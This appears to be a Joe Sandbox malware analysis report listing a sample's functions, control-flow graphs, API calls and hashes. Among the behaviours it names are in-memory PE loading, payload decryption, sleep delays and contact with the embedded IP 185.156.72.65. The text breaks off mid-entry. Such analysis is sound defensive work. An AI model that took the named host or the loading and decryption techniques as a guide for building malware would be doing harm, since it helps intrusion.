796 495068f-49506b2 793->796 801 4950849 794->801 802 495084b-495086c 794->802 795->777 803 49506b4-49506ed 796->803 804 49506ef-49506fc 796->804 797->792 799 495057c-4950599 798->799 800 495059b-49505bb 798->800 812 49505bd-49505db 799->812 800->812 801->774 802->786 803->804 806 49506fe-4950748 804->806 807 495074b 804->807 806->807 807->793 812->784
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0495024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14
                      Function 00405A50 Relevance: 11.2, APIs: 2, Strings: 5, Instructions: 678sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 954 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->954 955 4063af call 407100 862->955 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1020 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1020 1021 4064ae-4064b3 call 4074a0 885->1021 1147 4065c3-4065c8 call 4078c0 918->1147 1148 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1148 963 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->963 964 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->964 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 954->1016 1017 4063fd-406402 call 407210 954->1017 962 4063b4-4063c7 call 408920 call 402460 955->962 992 40686f-406878 call 4023e0 call 402390 962->992 1034 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 963->1034 1035 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 963->1035 964->1016 992->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1017->962 1020->1016 1091 4064e9-4064ee call 4075b0 1020->1091 1021->962 1034->1016 1099 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1035->1099 1100 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1035->1100 1091->884 1224 40685c-40686c call 4088c0 call 402460 1099->1224 1100->1016 1168 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1100->1168 1147->1148 1148->1016 1206 4065fe-406603 call 4079d0 1148->1206 1168->1224 1206->919 1224->992 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                      • API String ID: 2563648476-311857291
                      • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                      • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9
                      Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1292 402199-4021a0 call 409b7c 1290->1292 1293 402189-402197 1290->1293 1292->1289 1293->1292 1295 4021c8-4021f9 call 40cfef call 401e50 1293->1295
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                      • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                      Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1303 413cb9-413cc5 1304 413cf7-413d02 call 40d0dd 1303->1304 1305 413cc7-413cc9 1303->1305 1312 413d04-413d06 1304->1312 1307 413ce2-413cf3 RtlAllocateHeap 1305->1307 1308 413ccb-413ccc 1305->1308 1309 413cf5 1307->1309 1310 413cce-413cd5 call 412473 1307->1310 1308->1307 1309->1312 1310->1304 1315 413cd7-413ce0 call 4116b2 1310->1315 1315->1304 1315->1307
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 5(@
                      • API String ID: 1279760036-4133491027
                      • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                      • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                      Function 04950E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1331 4950e0f-4950e24 SetErrorMode * 2 1332 4950e26 1331->1332 1333 4950e2b-4950e2c 1331->1333 1332->1333
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04950223,?,?), ref: 04950E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04950223,?,?), ref: 04950E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5
                      Function 00607AEA Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1343 607aea-607b0a LoadLibraryA 1344 60c7e7-60c80d 1343->1344
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_603000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 51851aa3a336c3ac2ab989890fae12c575d505a9d2de42025f122c80c4f556f2
                      • Instruction ID: 259b1a01c972f1a5c0ebe0a0c9453b647dbbf3263b3e1e5863d7ea2b7eaa7efe
                      • Opcode Fuzzy Hash: 51851aa3a336c3ac2ab989890fae12c575d505a9d2de42025f122c80c4f556f2
                      • Instruction Fuzzy Hash: 4FE0BDB548D719CFC7183F65C08807EFBF1AF11710F220A0ED5D28A594D77A0496EA0B
                      Function 00703C5F Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1347 703c5f-703c83 VirtualProtect call 703c8b 1349 703c88 1347->1349
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 4537dc18018ddb924ebd27ad6171b2ccc8bce3bbce204e4e2cc4041153adfb3f
                      • Instruction ID: ebc8aa0ae85d02123b784d46dc44141e8ad5dfe9c1507a9d98ac7f5dde308e0b
                      • Opcode Fuzzy Hash: 4537dc18018ddb924ebd27ad6171b2ccc8bce3bbce204e4e2cc4041153adfb3f
                      • Instruction Fuzzy Hash: FAD0C73140476D97DF05DF34858568F3765DF55310F218619A401579868676AE218B9C
                      Function 047A8123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1350 47a8123-47a815d call 47a8436 1353 47a81ab 1350->1353 1354 47a815f-47a8192 VirtualAlloc call 47a81b0 1350->1354 1353->1353 1356 47a8197-47a81a9 1354->1356 1356->1353
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 047A8174
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81
                      Function 00705981 Relevance: 1.3, APIs: 1, Instructions: 27sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1357 705981-705a5d Sleep 1361 705a63 1357->1361 1362 705a5e call 705a66 1357->1362 1362->1361
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: af38090a1ef892c946439fcbdc65869c2570ee2d6009b7d395b5e6b7fe7fe5d2
                      • Instruction ID: bf3dbcbb2bbb2b520a67328dfa65eac8b1462156b1de81fe2e6108f803bb274d
                      • Opcode Fuzzy Hash: af38090a1ef892c946439fcbdc65869c2570ee2d6009b7d395b5e6b7fe7fe5d2
                      • Instruction Fuzzy Hash: FA01DDB594820ECBDF04CF6AC48978F7BA5FF48300F50421AE94586E80C7B61D648F5D
                      Function 007059CE Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1363 7059ce-7059d4 Sleep 1366 705a29-705a5d 1363->1366 1367 705a63 1366->1367 1368 705a5e call 705a66 1366->1368 1368->1367
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_703000_file.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 0a3d81d40254831e356f5042eca42dd7c147442d8b42812467424555651f0bfd
                      • Instruction ID: 8e77d9cc3632a8e49e27bba551ecfdcce17c6f97ac94c610b763a5ab4cbb2934
                      • Opcode Fuzzy Hash: 0a3d81d40254831e356f5042eca42dd7c147442d8b42812467424555651f0bfd
                      • Instruction Fuzzy Hash: A0F0587554860ECFDB04CF68C48939F7BA0EF09300F644258E84683E81C7B61D24CE1E

                      Non-executed Functions

                      Function 04953FA7 Relevance: 45.6, APIs: 20, Strings: 5, Instructions: 1839sleepcomCOMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04954011
                      • Sleep.KERNEL32(000003E8), ref: 049541A9
                      • __Init_thread_footer.LIBCMT ref: 0495477E
                      • __Init_thread_footer.LIBCMT ref: 04954944
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954B4E
                      • __Init_thread_footer.LIBCMT ref: 04954BDC
                      • __Init_thread_footer.LIBCMT ref: 04954E45
                      • CoInitialize.OLE32(00000000), ref: 04954EC6
                      • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04954EE1
                      • __Init_thread_footer.LIBCMT ref: 04955344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                      • __Init_thread_footer.LIBCMT ref: 04955652
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954F4F
                        • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                        • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                      • __Init_thread_footer.LIBCMT ref: 049542AD
                        • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                        • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        • Part of subcall function 04952487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049524BD
                        • Part of subcall function 04952487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049524DE
                        • Part of subcall function 04952487: CloseHandle.KERNEL32(00000000), ref: 049524E5
                      • __Init_thread_footer.LIBCMT ref: 04954489
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                      • API String ID: 529012138-2214808123
                      • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction ID: 175f9b9b8e5e0ed6967ab2b4efcc17d5098a5b891e341e984bef65d0d0da54a3
                      • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction Fuzzy Hash: 52F2D1B0D042549FEB24CF24DC48BADBBB4AF44308F6442E8E8096B2A1D775BAC5CF55
                      Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454COMMON
                      Download Yara Rule
                      APIs
                      • SetLastError.KERNEL32(0000000D), ref: 00402F02
                      • SetLastError.KERNEL32(000000C1), ref: 00402F44
                      Strings
                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                      • DOS header size is not valid!, xrefs: 00402F71
                      • ERROR_OUTOFMEMORY!, xrefs: 00403062
                      • DOS header is not valid!, xrefs: 00402F32
                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                      • Size is not valid!, xrefs: 00402F08
                      • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                      • Section alignment invalid!, xrefs: 00402FC7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                      • API String ID: 1452528299-2436911586
                      • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                      • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                      Function 004035D0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,DE4EB787), ref: 00403650
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                      • GetLastError.KERNEL32 ref: 004036E8
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                      • GetLastError.KERNEL32 ref: 0040371A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                      • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                      • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                      Function 04953837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049538B7
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049538DB
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04953945
                      • GetLastError.KERNEL32 ref: 0495394F
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04953977
                      • GetLastError.KERNEL32 ref: 04953981
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04953991
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04953A53
                      • CryptDestroyKey.ADVAPI32(?), ref: 04953AC5
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04953893
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction ID: 59e7dc52144a8d82591a686373c6de8e293fa5690d896e85b7fa2fa1b2dd26a3
                      • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction Fuzzy Hash: FD816171A002189FEB24DF24CC45B9ABBB5EF45340F1481B9E94DE72A1DB31AE858F51
                      Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                      • LocalFree.KERNEL32(00000000), ref: 00402B62
                      • LocalFree.KERNEL32(?), ref: 00402B67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                      • String ID: %s: %s$Error protecting memory page
                      • API String ID: 839691724-1484484497
                      • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                      • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                      Function 005EF55C Relevance: 14.1, Strings: 10, Instructions: 1599COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: 1wW$=K$F.~x$GOk$^uy}$^uy}$f|m$rXzo$xpw$Hn
                      • API String ID: 0-2994985386
                      • Opcode ID: 9536ff731ea9a04099f2dd48c471229258bacb373077cac6a78d91f4ed9e5a36
                      • Instruction ID: 062d67c6daadd2c4b03f25f293af44ec155b667b491b874c1d6b5da2920f4241
                      • Opcode Fuzzy Hash: 9536ff731ea9a04099f2dd48c471229258bacb373077cac6a78d91f4ed9e5a36
                      • Instruction Fuzzy Hash: 22B228F3A082049FE3046E2DEC8567AFBE9EF94720F16493DEAC5C7744EA3558058687
                      Function 005F108D Relevance: 14.1, Strings: 10, Instructions: 1589COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098648307.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: S}{$r^$')w|$5f[]$8_F^$<_F^$iqC=$qG}|$x[o{$$P~
                      • API String ID: 0-227172594
                      • Opcode ID: 3fab1447a8a84ce9430b4d46f666382212a35e3ead55a7286f6c86f5684378c0
                      • Instruction ID: 9b8d51feb1ff1aa3f6e6f41a3b172282b6e78972ab23d24481be7c4c58da4220
                      • Opcode Fuzzy Hash: 3fab1447a8a84ce9430b4d46f666382212a35e3ead55a7286f6c86f5684378c0
                      • Instruction Fuzzy Hash: 79B2E7F3A0C2009FE704AE2DEC8567ABBE9EF94720F16493DEAC5C7344E63558058697
                      Function 049551D7 Relevance: 12.9, APIs: 5, Strings: 2, Instructions: 621sleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                        • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                        • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                        • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                      • __Init_thread_footer.LIBCMT ref: 04955344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                      • __Init_thread_footer.LIBCMT ref: 04955652
                      • Sleep.KERNEL32(000007D0), ref: 049559BC
                      • Sleep.KERNEL32(000007D0), ref: 049559D6
                      Strings
                      Memory Dump Source
